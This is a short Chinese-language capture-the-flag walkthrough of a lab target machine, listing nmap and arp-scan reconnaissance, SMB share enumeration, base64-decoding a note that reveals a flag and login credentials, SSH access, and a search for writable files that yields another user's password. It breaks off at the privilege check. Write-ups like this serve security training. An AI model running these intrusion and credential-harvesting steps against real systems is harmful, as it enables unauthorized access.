一、信息收集
首先在已知靶机ip 192.168.0.109
进行正常流程:
arp-scan -l (寻找靶机的ip)
根据靶机的mac地址可以知道其ip地址
sudo nmap -sT --min-rate 10000 192.168.0.109 (对此ip进行扫描)
扫描结果如下,开放了22,80,139,445 四个端口。
sudo nmap -sT -sC -sV -O -p22,80,139,445 (详细信息扫描)
sudo nmap -sU --top-ports 20 192.168.0.109
漏洞探测扫描
sudo nmap --script=vuln -p22,80,139,445 192.168.0.109
二、## 浏览信息
发现开放的139,445端口都是Samba目录,优先级高
sudo smbmap -H 192.168.0.109
使用mget *.txt获取FLAG1.txt和message_from_aveng.txt
查看message_from_aveng.txt得到
对该子串进行base64解密
echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K | base64 -d
成功拿到FLAG1
且拿到user为 wavex 的账号密码
查看一下80端口
页面和源代码都没有可利用信息
把图像下下来之后
wget http://192.168.0.109/bkgro.png
exiftool bkgro.png
//查看图片是否有隐写或其他有用信息
没有可利用价值
利用ssh连接
sudo ssh wavex@192.168.0.109
成功连接
利用find查找可写入文件
find / -writable -type -f ! -path '/proc/*' 2>/dev/null
获得aveng的账号密码
直接su aveng输入密码后切换成功
利用 sudo -l查看权限
定妆照
成功拿下本台靶机